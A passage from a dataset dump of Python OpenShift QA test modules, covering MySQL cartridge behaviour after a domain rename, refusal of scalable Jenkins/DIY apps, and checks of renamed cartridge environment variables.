self.test_variant = self.config.test_variant\n        except:\n            self.info(\"Missing OPENSHIFT_test_name, using `ruby` as default.\")\n            self.test_variant = 'ruby'\n\n        self.new_domain_name = common.getRandomString(10)\n\n        self.app_name = \"app\"+self.test_variant\n        self.git_repo = \"./%s\" % (self.app_name)\n        self.app_type = common.app_types[self.test_variant]\n        self.domain_name = common.get_domain_name()\n        self.steps_list = []\n\n        common.env_setup()\n\n    def finalize(self):\n        os.system(\"rm -rf %s\"%(self.app_name))\n\nclass 
MysqlAfterAlterNamespace(OpenShiftTest):\n def test_method(self):\n #1\n self.steps_list.append(testcase.TestCaseStep(\"1.Create an express app\",\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n #2\n self.steps_list.append(testcase.TestCaseStep(\"2.Embed mysql to the app\",\n common.embed,\n function_parameters=[self.app_name, \"add-mysql-5.1\", self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"mysql cartridge is embedded successfully\",\n expect_return=0))\n\n #3\n cmd_prefix = \"unalias cp ; \"\n cmd_dict = {\n \"jbossas\": \"cp -f %s/app_template/mysql/mysql.jsp %s/src/main/webapp/\" % (WORK_DIR, self.git_repo),\n \"php\" : \"cp -f %s/app_template/mysql/mysql.php %s/php/\" % (WORK_DIR, self.git_repo),\n \"perl\" : \"cp -f %s/app_template/mysql/mysql.pl %s/perl/\" % (WORK_DIR, self.git_repo),\n \"python\" : \"cp -f %s/app_template/mysql/application %s/wsgi/\" % (WORK_DIR, self.git_repo),\n \"ruby\" : \"cp -f %s/app_template/mysql/config.ru %s/\" % (WORK_DIR, self.git_repo)}\n\n cmd = ''.join((cmd_prefix, cmd_dict[self.test_variant]))\n self.steps_list.append(testcase.TestCaseStep(\"3.Copy the corresponding app template to the app repo\",\n cmd,\n expect_description=\"Copy succeeded\",\n expect_return=0))\n\n #4\n self.steps_list.append(testcase.TestCaseStep(\n \"4.Change the mysql url, username, password, database name to the app's ones\",\n \"%s\",\n string_parameters=[self.get_cmd()],\n expect_description=\"Change succeeded\",\n expect_return=0))\n\n if self.test_variant in (\"python\", \"ruby\"):\n suffix = \"mysql\"\n elif self.app_type.find(\"php\") != -1:\n suffix = \"mysql.php\"\n elif self.app_type.find(\"jboss\") != -1:\n suffix = \"mysql.jsp\"\n elif self.app_type.find(\"perl\") != -1:\n suffix = \"mysql.pl\"\n\n def get_app_url(app_name, suffix):\n def closure():\n url = OSConf.get_app_url(app_name)\n return url+\"/\"+suffix\n return closure\n\n #5\n self.steps_list.append(testcase.TestCaseStep(\"5.Access the app to check if mysql works\",\n common.grep_web_page,\n function_parameters=[get_app_url(self.app_name, suffix), \n \"Tim Bunce, Advanced Perl DBI\", \n \"-H 'Pragma: no-cache'\", 5, 6],\n expect_description=\"mysql works well\",\n expect_return=0))\n \n #6\n self.steps_list.append(testcase.TestCaseStep(\"6.Alter the domain name\",\n common.alter_domain,\n function_parameters=[self.new_domain_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"Domain was altered successfully\",\n expect_return=0))\n\n #7\n self.steps_list.append(testcase.TestCaseStep(\"7.Access the app again to check if mysql still works\",\n common.grep_web_page,\n function_parameters=[get_app_url(self.app_name,suffix), \n \"Tim Bunce, Advanced Perl DBI\", \n \"-H 'Pragma: no-cache'\", 5, 6],\n expect_description=\"mysql still works well\",\n expect_return=0))\n #8\n self.steps_list.append(testcase.TestCaseStep(\"8.Change the domain name back\",\n common.alter_domain,\n function_parameters=[self.domain_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"Domain was changed back successfully\",\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % 
self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n def get_cmd(self):\n def closure():\n mysql_url = OSConf.default.conf['apps'][self.app_name]['embed']['mysql-5.1']['url']\n mysql_user = OSConf.default.conf['apps'][self.app_name]['embed']['mysql-5.1']['username']\n mysql_passwd = OSConf.default.conf['apps'][self.app_name]['embed']['mysql-5.1']['password']\n mysql_dbname = OSConf.default.conf['apps'][self.app_name]['embed']['mysql-5.1']['database']\n cmd_dict = {\n \"jbossas\": \"cd %s\" % (self.git_repo),\n \"php\" : \"cd %s/php && sed -i -e 's/changeme_url/%s/g' mysql.php && sed -i -e 's/changeme_username/%s/g' mysql.php && sed -i -e 's/changeme_password/%s/g' mysql.php && sed -i -e 's/changeme_db/%s/g' mysql.php\" % (self.git_repo, mysql_url, mysql_user, mysql_passwd, mysql_dbname),\n \"perl\" : \"cd %s/perl && sed -i -e 's/changeme_url/%s/g' mysql.pl && sed -i -e 's/changeme_username/%s/g' mysql.pl && sed -i -e 's/changeme_password/%s/g' mysql.pl && sed -i -e 's/changeme_db/%s/g' mysql.pl\" % (self.git_repo, mysql_url, mysql_user, mysql_passwd, mysql_dbname),\n \"python\" : \"cd %s/wsgi && sed -i -e 's/changeme_url/%s/g' application && sed -i -e 's/changeme_username/%s/g' application && sed -i -e 's/changeme_password/%s/g' application && sed -i -e 's/changeme_db/%s/g' application\" % (self.git_repo, mysql_url, mysql_user, mysql_passwd, mysql_dbname),\n \"ruby\" : \"cd %s && sed -i -e 's/changeme_url/%s/g' config.ru && sed -i -e 's/changeme_username/%s/g' config.ru && sed -i -e 's/changeme_password/%s/g' config.ru && sed -i -e 's/changeme_db/%s/g' config.ru\" % (self.git_repo, mysql_url, mysql_user, mysql_passwd, mysql_dbname)}\n cmd_postfix = \" && git add . 
; git commit -am t && git push\"\n            cmd = ''.join((cmd_dict[self.test_variant], cmd_postfix))\n            return cmd\n\n        return closure\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(MysqlAfterAlterNamespace)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5841924548149109, "alphanum_fraction": 0.5917525887489319, "avg_line_length": 35.83871078491211, "blob_id": "6aa0304eca8f6938246a55bb31d7e7f25f24a414", "content_id": "04add5cd8132146684a0cf049fd9c2b4c6b58dae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2284, "license_type": "no_license", "max_line_length": 221, "num_lines": 62, "path": "/automation/open/testmodules/RT/scaling/prohibit_jenkins_diy.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\nMay 9, 2012\n\n[US2089][BI] Prohibit an app of jenkins/diy type from being created as scalable app\nhttps://tcms.engineering.redhat.com/case/145114\n\"\"\"\nimport rhtest\n#### test specific import\nimport common\nimport openshift\n\n\nclass OpenShiftTest(rhtest.Test):\n    INTERACTIVE = False\n\n    def initialize(self):\n        self.summary = \"[US2089][BI] Prohibit an app of jenkins/diy type from being created as scalable app\"\n        self.step = 0\n        common.env_setup()\n\n    def finalize(self):\n        common.clean_up()\n    \n\nclass ProhibitScalableJenkinsDiy(OpenShiftTest):\n    def test_method(self):\n        step = 0\n        for app_type in [ common.app_types['jenkins'], common.app_types['diy'] ]:\n            self.step = self.step + 1\n            self.info(\"==========================================\")\n            self.info(\"Creating application via REST API: \" + app_type)\n            self.info(\"==========================================\")\n            (status, res) = self.config.rest_api.app_create(\"testapp%d\" % self.step, app_type, 'true')\n            self.info(\"status=%s, response=%s\"%(status, res))\n            self.assert_not_equal(status, 'OK', \"It's possible to create a scalable app via REST API with type \" + app_type)\n            \n            self.info(\"==========================================\")\n            self.info(\"Creating application in command line: \" + app_type)\n            self.info(\"==========================================\")\n            ( ret_code, ret_output ) = common.command_getstatusoutput(\"rhc app create testapp%d %s -s --no-git -l %s -p '%s'\" % ( self.step, app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd ))\n\n            self.assert_true( ret_code != 0, \"It's possible to create a scalable application with type \" + app_type )\n            #self.assert_true( ret_output.find(\"Can not create a scaling app\") != -1, \"Error-message must be meaningful\")\n\n        return self.passed(self.summary)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(ProhibitScalableJenkinsDiy)\n    #### user can add multiple sub tests here.\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n" }, { "alpha_fraction": 0.5219117999076843, "alphanum_fraction": 0.5271471738815308, "avg_line_length": 59.2092399597168, "blob_id": "3e3c78022e5c8656a3991c8857d5941a3e433616", "content_id": "bf1f6a4c9bf3dc6895a391596dc30b082cb1a997", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22157, "license_type": "no_license", "max_line_length": 278, "num_lines": 368, "path": 
"/automation/open/testmodules/RT/cartridge/namespaced_env_vars.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\n2012-11-09\n\n[US926][Runtime][rhc-cartridge]MySQL Admin(phpmyadmin) support\nhttps://tcms.engineering.redhat.com/case/138803/\n\"\"\"\nimport os\nimport common\nimport OSConf\nimport rhtest\nimport time\nimport pexpect\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False # define to True if your test is interactive (takes user input).\n ITEST = ['DEV', 'INT', 'STG'] #this will be checked by framework\n\n def initialize(self):\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"WARN: Missing variant, used `python` as default\")\n self.test_variant = 'python'\n try:\n self.scalable = self.config.tcms_arguments['scalable']\n except:\n self.scalable = False\n self.summary = \"[US926][Runtime][rhc-cartridge]MySQL Admin(phpmyadmin) support\"\n self.app_name = \"envvar\" + common.getRandomString(6)\n self.app_type = common.app_types[self.test_variant]\n self.cart = common.type_to_cart(self.app_type)\n self.git_repo = \"./%s\" % (self.app_name)\n\n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass NamespacedEnvVars(OpenShiftTest):\n def get_env_list(self, main_cart, *cart_list):\n env_list = { \"GLOBAL\" : [ (\"removed\", \"OPENSHIFT_GEAR_CTL_SCRIPT\"),\n (\"removed\", \"OPENSHIFT_GEAR_DIR\"),\n (\"removed\", \"OPENSHIFT_GEAR_TYPE\"),\n (\"removed\", \"OPENSHIFT_APP_DIR\"),\n (\"removed\", \"OPENSHIFT_APP_TYPE\"),\n (\"unchanged\", \"OPENSHIFT_GEAR_NAME\"),\n (\"translated\", \"OPENSHIFT_RUNTIME_DIR\", \"\"),\n (\"translated\", \"OPENSHIFT_LOG_DIR\", \"OPENSHIFT_%s_LOG_DIR\" % (main_cart)),\n (\"translated\", \"OPENSHIFT_RUN_DIR\", \"\"),\n (\"new\", \"OPENSHIFT_%s_IP\" % (main_cart)),\n (\"new\", \"OPENSHIFT_%s_PORT\" % (main_cart)),\n (\"unchanged\", \"OPENSHIFT_APP_DNS\"),\n (\"unchanged\", \"OPENSHIFT_APP_NAME\"),\n (\"unchanged\", \"OPENSHIFT_APP_UUID\"),\n (\"unchanged\", \"OPENSHIFT_DATA_DIR\"),\n (\"unchanged\", \"OPENSHIFT_GEAR_DNS\"),\n (\"unchanged\", \"OPENSHIFT_GEAR_UUID\"),\n (\"unchanged\", \"OPENSHIFT_HOMEDIR\"),\n #(\"unchanged\", \"OPENSHIFT_INTERNAL_IP\"),\n #(\"unchanged\", \"OPENSHIFT_INTERNAL_PORT\"),\n (\"unchanged\", \"OPENSHIFT_REPO_DIR\"),\n (\"unchanged\", \"OPENSHIFT_TMP_DIR\")],\n \"JBOSSAS\":[ (\"translated\", \"OPENSHIFT_JBOSS_CLUSTER\", \"OPENSHIFT_JBOSSAS_CLUSTER\"),\n (\"translated\", \"OPENSHIFT_JBOSS_CLUSTER_PORT\", \"OPENSHIFT_JBOSSAS_CLUSTER_PORT\"),\n (\"translated\", \"OPENSHIFT_JBOSS_CLUSTER_PROXY_PORT\", \"OPENSHIFT_JBOSSAS_CLUSTER_PROXY_PORT\"),\n (\"translated\", \"OPENSHIFT_JBOSS_CLUSTER_REMOTING\", \"OPENSHIFT_JBOSSAS_CLUSTER_REMOTING\"),\n (\"translated\", \"OPENSHIFT_JBOSS_MESSAGING_PORT\", \"OPENSHIFT_JBOSSAS_MESSAGING_PORT\"),\n (\"translated\", \"OPENSHIFT_JBOSS_MESSAGING_THROUGHPUT_PORT\", \"OPENSHIFT_JBOSSAS_MESSAGING_THROUGHPUT_PORT\"),\n (\"translated\", \"OPENSHIFT_JBOSS_REMOTING_PORT\", \"OPENSHIFT_JBOSSAS_REMOTING_PORT\")],\n \"JENKINS\":[ (\"unchanged\", \"JENKINS_USERNAME\"),\n (\"unchanged\", \"JENKINS_PASSWORD\"),\n (\"unchanged\", \"JENKINS_URL\")],\n \"JENKINSCLIENT\":[(\"unchanged\", \"JENKINS_USERNAME\"),\n (\"unchanged\", \"JENKINS_PASSWORD\"),\n (\"unchanged\", \"JENKINS_URL\"),\n (\"new\", \"OPENSHIFT_JENKINS_CLIENT_DIR\"),\n (\"new\", \"OPENSHIFT_JENKINS_CLIENT_IDENT\")],\n \"HAPROXY\":[ (\"new\", \"OPENSHIFT_HAPROXY_INTERNAL_IP\"),\n 
(\"new\", \"OPENSHIFT_HAPROXY_STATUS_IP\")],\n \"MYSQL\" : [ (\"removed\", \"OPENSHIFT_DB_CTL_ONGEAR_SCRIPT\"),\n (\"removed\", \"OPENSHIFT_DB_CTL_SCRIPT\"),\n (\"removed\", \"OPENSHIFT_DB_MYSQL_51_DUMP\"),\n (\"removed\", \"OPENSHIFT_DB_MYSQL_51_DUMP_CLEANUP\"),\n (\"removed\", \"OPENSHIFT_DB_MYSQL_51_PROFILE\"),\n (\"removed\", \"OPENSHIFT_DB_MYSQL_51_RESTORE\"),\n (\"removed\", \"OPENSHIFT_DB_TYPE\"),\n (\"translated\", \"OPENSHIFT_DB_HOST\", \"OPENSHIFT_MYSQL_DB_HOST\"),\n (\"translated\", \"OPENSHIFT_DB_PORT\", \"OPENSHIFT_MYSQL_DB_PORT\"),\n (\"translated\", \"OPENSHIFT_DB_USERNAME\", \"OPENSHIFT_MYSQL_DB_USERNAME\"),\n (\"translated\", \"OPENSHIFT_DB_PASSWORD\", \"OPENSHIFT_MYSQL_DB_PASSWORD\"),\n (\"translated\", \"OPENSHIFT_DB_SOCKET\", \"OPENSHIFT_MYSQL_DB_SOCKET\"),\n (\"translated\", \"OPENSHIFT_DB_URL\", \"OPENSHIFT_MYSQL_DB_URL\"),\n (\"new\", \"OPENSHIFT_MYSQL_DB_LOG_DIR\")],\n \"POSTGRESQL\":[ (\"removed\", \"OPENSHIFT_DB_POSTGRESQL_84_DUMP\"),\n (\"removed\", \"OPENSHIFT_DB_POSTGRESQL_84_DUMP_CLEANUP\"),\n (\"removed\", \"OPENSHIFT_DB_POSTGRESQL_84_EMBEDDED_TYPE\"),\n (\"removed\", \"OPENSHIFT_DB_POSTGRESQL_84_RESTORE\"),\n (\"removed\", \"OPENSHIFT_DB_TYPE\"),\n (\"translated\", \"OPENSHIFT_DB_HOST\", \"OPENSHIFT_POSTGRESQL_DB_HOST\"),\n (\"translated\", \"OPENSHIFT_DB_PORT\", \"OPENSHIFT_POSTGRESQL_DB_PORT\"),\n (\"translated\", \"OPENSHIFT_DB_USERNAME\", \"OPENSHIFT_POSTGRESQL_DB_USERNAME\"),\n (\"translated\", \"OPENSHIFT_DB_PASSWORD\", \"OPENSHIFT_POSTGRESQL_DB_PASSWORD\"),\n (\"translated\", \"OPENSHIFT_DB_SOCKET\", \"OPENSHIFT_POSTGRESQL_DB_SOCKET\"),\n (\"translated\", \"OPENSHIFT_DB_URL\", \"OPENSHIFT_POSTGRESQL_DB_URL\"),\n (\"new\", \"OPENSHIFT_POSTGRESQL_DB_LOG_DIR\")],\n \"MONGODB\":[ (\"removed\", \"OPENSHIFT_NOSQL_DB_CTL_ONGEAR_SCRIPT\"),\n (\"removed\", \"OPENSHIFT_NOSQL_DB_CTL_SCRIPT\"),\n (\"removed\", \"OPENSHIFT_NOSQL_DB_MONGODB_22_DUMP\"),\n (\"removed\", \"OPENSHIFT_NOSQL_DB_MONGODB_22_DUMP_CLEANUP\"),\n (\"removed\", \"OPENSHIFT_NOSQL_DB_MONGODB_22_EMBEDDED_TYPE\"),\n (\"removed\", \"OPENSHIFT_NOSQL_DB_MONGODB_22_RESTORE\"),\n (\"removed\", \"OPENSHIFT_NOSQL_DB_TYPE\"),\n (\"translated\", \"OPENSHIFT_NOSQL_DB_HOST\", \"OPENSHIFT_MONGODB_DB_HOST\"),\n (\"translated\", \"OPENSHIFT_NOSQL_DB_PASSWORD\", \"OPENSHIFT_MONGODB_DB_PASSWORD\"),\n (\"translated\", \"OPENSHIFT_NOSQL_DB_PORT\", \"OPENSHIFT_MONGODB_DB_PORT\"),\n (\"translated\", \"OPENSHIFT_NOSQL_DB_URL\", \"OPENSHIFT_MONGODB_DB_URL\"),\n (\"translated\", \"OPENSHIFT_NOSQL_DB_USERNAME\", \"OPENSHIFT_MONGODB_DB_USERNAME\"),\n (\"new\", \"OPENSHIFT_MONGODB_DB_LOG_DIR\")],\n \"PHPMYADMIN\":[ (\"new\", \"OPENSHIFT_PHPMYADMIN_IP\"),\n (\"new\", \"OPENSHIFT_PHPMYADMIN_PORT\"),\n (\"new\", \"OPENSHIFT_PHPMYADMIN_LOG_DIR\"),\n (\"removed\", \"OPENSHIFT_PHPMYADMIN_CTL_SCRIPT\"),\n (\"removed\", \"OPENSHIFT_PHPMYADMIN_GEAR_DIR\")],\n \"ROCKMONGO\":[ (\"new\", \"OPENSHIFT_ROCKMONGO_LOG_DIR\"),\n (\"new\", \"OPENSHIFT_ROCKMONGO_IP\"),\n (\"new\", \"OPENSHIFT_ROCKMONGO_PORT\"),\n (\"removed\", \"OPENSHIFT_ROCKMONGO_CTL_SCRIPT\"),\n (\"removed\", \"OPENSHIFT_ROCKMONGO_GEAR_DIR\")],\n \"10GENMMSAGENT\":[(\"removed\", \"OPENSHIFT_10GEN_MMS_AGENT_CTL_SCRIPT\"),\n (\"removed\", \"OPENSHIFT_10GEN_MMS_AGENT_GEAR_DIR\"),\n (\"new\", \"OPENSHIFT_10GENMMSAGENT_IDENT\"),\n (\"new\", \"OPENSHIFT_10GENMMSAGENT_DIR\")],\n \"CRON\": [ (\"removed\", \"OPENSHIFT_BATCH_CRON_14_EMBEDDED_TYPE\"),\n (\"removed\", \"OPENSHIFT_BATCH_CTL_SCRIPT\"),\n (\"removed\", \"OPENSHIFT_BATCH_TYPE\")],\n }\n expected_list = []\n unexpected_list 
= []\n cart_list = list(cart_list)\n cart_list.append(\"GLOBAL\")\n for cart in cart_list:\n for i in env_list.get(cart, []):\n if i[0] == \"unchanged\":\n expected_list.append(i[1])\n elif i[0] == \"translated\":\n expected_list.append(i[2])\n unexpected_list.append(i[1])\n elif i[0] == \"removed\":\n unexpected_list.append(i[1])\n elif i[0] == \"new\":\n expected_list.append(i[1])\n expected_list = list(set(expected_list))\n unexpected_list = list(set(unexpected_list))\n return (expected_list, unexpected_list)\n\n def check_env_var(self, output, expected_list, unexpected_list):\n missing_list = []\n existing_list = []\n for i in expected_list:\n if output.find(i) == -1:\n missing_list.append(i)\n for i in unexpected_list:\n if output.find(i) != -1:\n existing_list.append(i)\n return (missing_list, existing_list)\n\n def check_jenkins_app(self, app_name):\n ssh_url = OSConf.get_ssh_url(app_name)\n print \"ssh url: %s\" % (ssh_url)\n self.ssh_proc = pexpect.spawn(\"ssh -o StrictHostKeyChecking=no -o ConnectTimeout=20 %s 'env'\" % (ssh_url))\n output = self.ssh_proc.read()\n print \"Output: %s\" % (output)\n self.ssh_proc.close()\n expected_list, unexpected_list = self.get_env_list(common.type_to_cart(common.app_types[\"jenkins\"]), common.type_to_cart(common.app_types[\"jenkins\"]))\n print \"Cartridge: %s\" % (common.app_types[\"jenkins\"])\n print \"Expected env var list: %s\" % (','.join(expected_list))\n print \"Unexpected env var list: %s\" % (','.join(unexpected_list))\n missing_list, existing_list = self.check_env_var(output, expected_list, unexpected_list)\n flag = True\n if missing_list != []:\n print \"The following env vars are missing:\"\n print ', '.join(missing_list)\n flag = False\n if existing_list != []:\n print \"The following env vars,which should be removed, still exist:\"\n print ', '.join(existing_list)\n flag = False\n return flag\n\n def check_app(self, app_name, *cart_list):\n app_url = OSConf.get_app_url(app_name)\n common.stop_app(app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n common.start_app(app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n url_postfix_dict = { \"jbossas\" : \"/universal.jsp?group=env\",\n \"php\" : \"/universal.php?group=env\",\n \"ruby\" : \"/env\",\n \"python\" : \"/env\",\n \"perl\" : \"/universal.pl?group=env\",\n \"nodejs\" : \"/env\",\n }\n url_postfix_dict[\"jbosseap\"] = url_postfix_dict[\"jbossas\"]\n url_postfix_dict[\"jbossews\"] = url_postfix_dict[\"jbossas\"]\n url_postfix_dict[\"python-2.7\"] = url_postfix_dict[\"python\"]\n url_postfix_dict[\"python-3.3\"] = url_postfix_dict[\"python\"]\n url_postfix_dict[\"zend\"] = url_postfix_dict[\"php\"]\n url_postfix_dict[\"ruby-1.9\"] = url_postfix_dict[\"ruby\"]\n # Wait for the app to start\n common.grep_web_page(app_url + url_postfix_dict[self.test_variant], \"OPENSHIFT_APP_DNS\")\n content = common.fetch_page(app_url + url_postfix_dict[self.test_variant])\n expected_list, unexpected_list = self.get_env_list(self.cart, *cart_list)\n print \"Cartridge list: %s\" % (','.join(cart_list))\n print \"Expected env var list: %s\" % (','.join(expected_list))\n print \"Unexpected env var list: %s\" % (','.join(unexpected_list))\n missing_list, existing_list = self.check_env_var(content, expected_list, unexpected_list)\n flag = True\n if missing_list != []:\n print \"The following env vars are missing:\"\n print ', '.join(missing_list)\n flag = False\n if existing_list != []:\n print \"The following env vars,which should be removed, 
still exist:\"\n print ', '.join(existing_list)\n flag = False\n return flag\n\n def test_method(self):\n # Create app\n ret = common.create_app(self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"App creation failed\")\n\n src_path_dict = { \"jbossas\" : \"%s/app_template/universal/jbossas/universal.jsp\" % (WORK_DIR),\n \"php\" : \"%s/app_template/universal/php/universal.php\" % (WORK_DIR),\n \"ruby\" : \"%s/app_template/universal/ruby/config.ru\" % (WORK_DIR),\n \"python\" : \"%s/app_template/universal/python/application\" % (WORK_DIR),\n \"python-2.7\" : \"%s/app_template/universal/python-2.7/application\" % (WORK_DIR),\n \"perl\" : \"%s/app_template/universal/perl/universal.pl\" % (WORK_DIR),\n \"nodejs\" : \"%s/app_template/universal/nodejs/server.js\" % (WORK_DIR),\n }\n src_path_dict[\"jbosseap\"] = src_path_dict[\"jbossas\"]\n src_path_dict[\"jbossews\"] = src_path_dict[\"jbossas\"]\n src_path_dict[\"ruby-1.9\"] = src_path_dict[\"ruby\"]\n src_path_dict[\"zend\"] = src_path_dict[\"php\"]\n src_path_dict[\"python-3.3\"] = src_path_dict[\"python\"]\n dst_path_dict = { \"jbossas\" : \"%s/src/main/webapp/\" % (self.app_name),\n \"php\" : \"%s/php/\" % (self.app_name),\n \"ruby\" : \"%s/\" % (self.app_name),\n \"python\" : \"%s/wsgi/\" % (self.app_name),\n \"perl\" : \"%s/perl/\" % (self.app_name),\n \"nodejs\" : \"%s/\" % (self.app_name),\n }\n dst_path_dict[\"jbosseap\"] = dst_path_dict[\"jbossas\"]\n dst_path_dict[\"jbossews\"] = dst_path_dict[\"jbossas\"]\n dst_path_dict[\"ruby-1.9\"] = dst_path_dict[\"ruby\"]\n dst_path_dict[\"zend\"] = dst_path_dict[\"php\"]\n dst_path_dict[\"python-2.7\"] = dst_path_dict[\"python\"]\n dst_path_dict[\"python-3.3\"] = dst_path_dict[\"python\"]\n ret, output = common.command_getstatusoutput('cp -f %s %s && cd %s && git add . 
&& git commit -amt && git push' % (src_path_dict[self.test_variant], dst_path_dict[self.test_variant], self.app_name))\n        self.assert_equal(ret, 0, output)\n\n        ret = self.check_app(self.app_name, self.cart)\n        self.assert_equal(ret, True, \"Env var check failed\")\n\n        # Add mysql to app\n        ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"mysql\"])\n        self.assert_equal(ret, 0, \"Failed to add mysql to app\")\n\n        ret = self.check_app(self.app_name, self.cart, common.type_to_cart(common.cartridge_types[\"mysql\"]))\n        self.assert_equal(ret, True, \"mysql env var check failed\")\n\n###        # Add phpmyadmin to app\n###        ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"phpmyadmin\"])\n###        self.assert_equal(ret, 0, \"Failed to add phpmyadmin to app\")\n###\n###        ret = self.check_app(self.app_name, self.cart, common.type_to_cart(common.cartridge_types[\"mysql\"]), common.type_to_cart(common.cartridge_types[\"phpmyadmin\"]))\n###        self.assert_equal(ret, True, \"phpmyadmin env var check failed\")\n###\n###        ret = common.embed(self.app_name, \"remove-\" + common.cartridge_types[\"phpmyadmin\"])\n###        self.assert_equal(ret, 0, \"Failed to remove phpmyadmin from app\")\n###\n###        ret = common.embed(self.app_name, \"remove-\" + common.cartridge_types[\"mysql\"])\n###        self.assert_equal(ret, 0, \"Failed to remove mysql from app\")\n###\n###        # Add postgresql to app\n###        ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"postgresql\"])\n###        self.assert_equal(ret, 0, \"Failed to add postgresql to app\")\n###\n###        ret = self.check_app(self.app_name, self.cart, common.type_to_cart(common.cartridge_types[\"postgresql\"]))\n###        self.assert_equal(ret, True, \"postgresql env var check failed\")\n###\n###        ret = common.embed(self.app_name, \"remove-\" + common.cartridge_types[\"postgresql\"])\n###        self.assert_equal(ret, 0, \"Failed to remove postgresql from app\")\n###\n###        # Add mongodb to app\n###        ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"mongodb\"])\n###        self.assert_equal(ret, 0, \"Failed to add mongodb to app\")\n###\n###        ret = self.check_app(self.app_name, self.cart, common.type_to_cart(common.cartridge_types[\"mongodb\"]))\n###        self.assert_equal(ret, True, \"mongodb env var check failed\")\n###\n###        # Add rockmongo to app\n###        ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"rockmongo\"])\n###        self.assert_equal(ret, 0, \"Failed to add rockmongo to app\")\n###\n###        ret = self.check_app(self.app_name, self.cart, common.type_to_cart(common.cartridge_types[\"mongodb\"]), common.type_to_cart(common.cartridge_types[\"rockmongo\"]))\n###        self.assert_equal(ret, True, \"rockmongo env var check failed\")\n###\n###        # Copy settings.py to app repo\n###        ret, output = common.command_getstatusoutput('mkdir -p %s/.openshift/mms/ && cp -f %s/app_template/settings.py %s/.openshift/mms && cd %s && git add . 
&& git commit -amt && git push' % (self.app_name, WORK_DIR, self.app_name, self.app_name))\n### self.assert_equal(ret, 0, output)\n###\n### # Add 10gen-mms-agent to app\n### ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"10gen\"])\n### self.assert_equal(ret, 0, \"Failed to add 10gen-mms-agent to app\")\n###\n### ret = self.check_app(self.app_name, self.cart, common.type_to_cart(common.cartridge_types[\"mongodb\"]), common.type_to_cart(common.cartridge_types[\"rockmongo\"]), common.type_to_cart(common.cartridge_types[\"10gen\"]))\n### self.assert_equal(ret, True, \"10gen-mms-agent env var check failed\")\n\n # Add cron to app\n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"cron\"])\n self.assert_equal(ret, 0, \"Failed to add cron to app\")\n\n #ret = self.check_app(self.app_name, self.cart, common.type_to_cart(common.cartridge_types[\"mongodb\"]), common.type_to_cart(common.cartridge_types[\"rockmongo\"]), common.type_to_cart(common.cartridge_types[\"cron\"]))\n ret = self.check_app(self.app_name, self.cart, common.type_to_cart(common.cartridge_types[\"cron\"]))\n self.assert_equal(ret, True, \"cron env var check failed\")\n\n # Create a jenkins app\n ret = common.create_app(\"server\", common.app_types[\"jenkins\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"App creation failed\")\n\n # Check the jenkins server app\n ret = self.check_jenkins_app(\"server\")\n self.assert_equal(ret, True, \"jenkins server app env var check failed\")\n\n # Add jenkins client to app\n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"jenkins\"])\n if ret != 0:\n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"jenkins\"])\n self.assert_equal(ret, 0, \"Failed to add jenkins client to app\")\n\n # Git push the app\n ret = common.trigger_jenkins_build(self.git_repo)\n self.assert_equal(ret, True, \"Failed to trigger jenkins build\")\n\n #ret = self.check_app(self.app_name, self.cart, common.type_to_cart(common.cartridge_types[\"mongodb\"]), common.type_to_cart(common.cartridge_types[\"rockmongo\"]), common.type_to_cart(common.cartridge_types[\"cron\"]), common.type_to_cart(common.cartridge_types[\"jenkins\"]))\n ret = self.check_app(self.app_name, self.cart, common.type_to_cart(common.cartridge_types[\"cron\"]), common.type_to_cart(common.cartridge_types[\"jenkins\"]))\n self.assert_equal(ret, True, \"cron env var check failed\")\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\n\nclass 